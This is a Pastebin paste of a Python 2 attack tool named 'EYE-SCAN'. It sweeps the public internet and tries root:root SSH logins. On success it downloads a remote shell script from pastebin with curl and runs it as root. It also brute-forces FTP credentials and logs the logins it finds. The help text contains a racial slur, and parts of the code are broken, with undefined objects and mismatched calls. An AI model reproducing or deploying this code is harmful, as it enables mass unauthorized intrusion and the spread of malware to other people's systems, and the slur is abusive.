Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import sys
- import argparse
- from ftplib import FTP
- import random
- import socket
- import getpass
- import pxssh #make sure your pxssh is updated
- import subprocess
- print "\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+"
- print " |----MASS SCANNING: EYE-SCAN BY EYEZIK----|"
- print " +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+"
- print "\n ./eyescan.py -h"
- if (sys.argv[1] == "-h"):
- print "\n more help --help\n --ssh-exploit (start ip: 1) \n --titles (start ip)\n --ftp-brute (start ip) -u USERNAME -p (word list)\n example: ./eyescan.py --ssh-exploit 101\n"
- elif (sys.argv[1] == "--help"):
- print "\n --ssh-exploit (start ip: 1) \n --titles (start ip)\n --ftp-brute\n -R root (will use login root:root)\n -u username(not needed if -R)\n -p password list /root/nigger.txt (not needed if -R)\n example: ./eyescan.py --ssh-exploit 101\n"
- else:
- if (sys.argv[1] == "--ssh-exploit"):
- print("\n [~] SSH SCAN/EXPLOIT [~]\n ")
- STRTIP = (sys.argv[2])
- for p in xrange(int(STRTIP),255):
- for q in xrange(0,255):
- for r in xrange(0,255):
- for s in xrange(0,255):
- ip = str(p) + "." + str(q) + "." + str(r) + "." + str(s)
- if (p==10 or p==127):
- ip = "null"
- elif (p == 100 and q >= 64 and q <= 127):
- ip = "null"
- elif (p >= 0 and p <= 15 and q >= 0 and q <= 20):
- ip = "null"
- elif (p == 169 and q == 254):
- ip = "null"
- elif (p == 172 and q >= 16 and q <= 31):
- ip = "null"
- elif (p == 192 and q == 0 and r == 0):
- ip = "null"
- elif (p == 192 and q == 0 and r == 2):
- ip = "null"
- elif (p == 192 and q == 88 and r == 99):
- ip = "null"
- elif (p == 192 and q == 168):
- ip = "null"
- elif (p == 192 and q == 18):
- ip = "null"
- elif (p == 192 and q == 19):
- ip = "null"
- elif (p == 192 and q == 51 and r == 100):
- # RFC5737: Documentation (TEST-NET-2)
- ip = "null"
- elif (p == 203 and r == 113):
- # RFC5737: Documentation (TEST-NET-2)
- ip = "null"
- elif (p >= 224):
- # RFC5737: Reserved D & E
- ip = "null"
- if (ip != "null"):
- print ip
- try:
- for port in range (21, 22):
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(0.5)
- result = sock.connect_ex((ip, port))
- if result == 0:
- print "SSH FOUND {}".format(ip, port)
- try:
- f = open("SSH.txt","a")
- f.write(ip)
- f.write("\n")
- f.close()
- s = pxssh.pxssh()
- s.SSH_OPTS += " -o StrictHostKeyChecking=no"
- hostname = ip
- username = ('root')
- password = ('root')
- s.login(hostname, username, password)
- i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT, "(?i)connection closed by remote host"], timeout=login_timeout)
- if i==0:
- self.sendline("yes")
- i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
- if i==2:
- self.sendline(password)
- i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
- if i==4:
- self.sendline(terminal_type)
- i = self.expect(["(?i)are you sure you want to continue connecting", original_prompt, "(?i)(?:password)|(?:passphrase for key)", "(?i)permission denied", "(?i)terminal type", TIMEOUT])
- if i==0:
- self.close()
- raise ExceptionPxssh('Weird error. Got "are you sure" prompt twice.')
- elif i==1:
- pass
- elif i==2:
- self.close()
- raise ExceptionPxssh('Wrong password')
- else:
- s.sendline('sudo curl -L https://pastebin.com/raw/ArHqXVnU -o groovy.sh')
- s.prompt()
- s.sendline('sudo chmod 777 groovy.sh')
- s.prompt()
- s.sendline('sudo ./groovy.sh')
- s.prompt()
- f = open("root_logins.txt","a")
- f.write(ip)
- f.write("\n")
- f.close()
- s.logout()
- except pxssh.ExceptionPxssh as e:
- print("ssh failed on login.")
- print(e)
- sock.close()
- except socket.error:
- print "Couldn't connect to server"
- except socket.gaierror:
- print 'Hostname could not be resolved. Exiting'
- if (sys.argv[1] == "--titles"):
- STRTIP = (sys.argv[2])
- print("\n [~] SCANNING TITLES [~]\n ")
- for p in xrange(int(STRTIP),255):
- for q in xrange(0,255):
- for r in xrange(0,255):
- for s in xrange(0,255):
- ip = str(p) + "." + str(q) + "." + str(r) + "." + str(s)
- if (p==10 or p==127):
- #Private IP and Loopback IP
- ip = "null"
- elif (p == 100 and q >= 64 and q <= 127):
- #Shared Address Space
- ip = "null"
- elif (p == 169 and q == 254):
- # APIPA
- ip = "null"
- elif (p == 172 and q >= 16 and q <= 31):
- #Private IP 172.16.0.0 - 172.31.255.255
- ip = "null"
- elif (p == 192 and q == 0 and r == 0):
- #192.0.0.0/24 # RFC6890: IETF Protocol Assignments
- ip = "null"
- elif (p == 192 and q == 0 and r == 2):
- #192.0.2.0/24 # RFC5737: Documentation (TEST-NET-1)
- ip = "null"
- elif (p == 192 and q == 88 and r == 99):
- #192.88.99.0/24 # RFC3068: 6to4 Relay Anycast
- ip = "null"
- elif (p == 192 and q == 168):
- #RFC1918: Private-Use
- ip = "null"
- elif (p == 192 and q == 18):
- # RFC2544: Benchmarking
- ip = "null"
- elif (p == 192 and q == 19):
- # RFC2544: Benchmarking
- ip = "null"
- elif (p == 192 and q == 51 and r == 100):
- # RFC5737: Documentation (TEST-NET-2)
- ip = "null"
- elif (p == 203 and r == 113):
- # RFC5737: Documentation (TEST-NET-2)
- ip = "null"
- elif (p >= 224):
- # RFC5737: Reserved D & E
- ip = "null"
- if (ip != "null"):
- print "scanning: {} ".format(ip)
- try:
- for port in range (79, 81):
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(0.5)
- result = sock.connect_ex((ip, port))
- if result == 0:
- #print "PORT OPEN ON {}".format(ip, port)
- try:
- ipurl = ('http://' + ip)
- print(ipurl)
- sock.settimeout(0.5)
- rq = requests.get(ipurl)
- soup = BeautifulSoup(str(rq.content))
- t = 'title'
- datitle = getattr(soup, t)
- print(datitle)
- f = open("webdb","a")
- f.write(ip)
- f.write(" ")
- f.write(str(datitle))
- f.write("\n")
- f.close()
- sock.close()
- except socket.error as e:
- print("Couldn't connect to server")
- print(e)
- sock.close()
- except socket.gaierror:
- print 'Hostname could not be resolved. Exiting'
- if (sys.argv[1] == "--ftp-brute"):
- STRTIP = (sys.argv[2])
- print("\n [~] FTP BRUTE FORCE SCAN [~]\n ")
- for p in xrange(int(STRTIP),255):
- for q in xrange(0,255):
- for r in xrange(0,255):
- for s in xrange(0,255):
- ip = str(p) + "." + str(q) + "." + str(r) + "." + str(s)
- if (p==10 or p==127):
- #Private IP and Loopback IP
- ip = "null"
- elif (p == 100 and q >= 64 and q <= 127):
- #Shared Address Space
- ip = "null"
- elif (p == 169 and q == 254):
- # APIPA
- ip = "null"
- elif (p == 172 and q >= 16 and q <= 31):
- #Private IP 172.16.0.0 - 172.31.255.255
- ip = "null"
- elif (p == 192 and q == 0 and r == 0):
- #192.0.0.0/24 # RFC6890: IETF Protocol Assignments
- ip = "null"
- elif (p == 192 and q == 0 and r == 2):
- #192.0.2.0/24 # RFC5737: Documentation (TEST-NET-1)
- ip = "null"
- elif (p == 192 and q == 88 and r == 99):
- #192.88.99.0/24 # RFC3068: 6to4 Relay Anycast
- ip = "null"
- elif (p == 192 and q == 168):
- #RFC1918: Private-Use
- ip = "null"
- elif (p == 192 and q == 18):
- # RFC2544: Benchmarking
- ip = "null"
- elif (p == 192 and q == 19):
- # RFC2544: Benchmarking
- ip = "null"
- elif (p == 192 and q == 51 and r == 100):
- # RFC5737: Documentation (TEST-NET-2)
- ip = "null"
- elif (p == 203 and r == 113):
- ip = "null"
- elif (p >= 224):
- # RFC5737: Reserved D & E
- ip = "null"
- if (ip != "null"):
- print "scanning: {} ".format(ip)
- try:
- for port in range (20, 21):
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(0.9)
- result = sock.connect_ex((ip, port))
- if result == 0:
- print "PORT OPEN ON {}".format(ip, port)
- try:
- def check_anonymous_login(ip):
- try:
- ftp = FTP(ip)
- ftp.login()
- print "\n[+] Anonymous login is open."
- print "\n User:pass = anonymous:anonymous"
- ftp.quit()
- except:
- pass
- def ftp_login(ip, username, password):
- try:
- ftp = FTP(ip)
- ftp.login(username, password)
- ftp.quit()
- print "\nLogged in"
- print "\nUsername : {}".format(username)
- print "\nPassword : {}".format(password)
- f = open("ftp-logins.txt","a")
- f.write(ip)
- f.write(" ")
- f.write(str(username))
- f.write(":")
- f.write(str(password))
- f.write("\n")
- f.close()
- except:
- pass
- def brute_force(username, wordlist):
- try:
- wordlist = open(wordlist, "r")
- words = wordlist.readlines()
- for word in words:
- word = word.strip()
- ftp_login(ip, username, word)
- except:
- print "\n[-] There is no such wordlist file. \n"
- parser = argparse.ArgumentParser()
- parser.add_argument("-R", "-u", "--username")
- parser.add_argument("-R", "-p", "--wordlist")
- args = parser.parse_args()
- username = args.username
- wordlist = args.wordlist
- brute_force(ip, username, wordlist)
- check_anonymous_login(target)
- print "\n[-] Brute force finished. \n"
- sock.close()
- except socket.error as e:
- print("Couldn't connect to server")
- print(e)
- sock.close()
- except socket.gaierror:
- print 'Hostname could not be resolved. Exiting'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
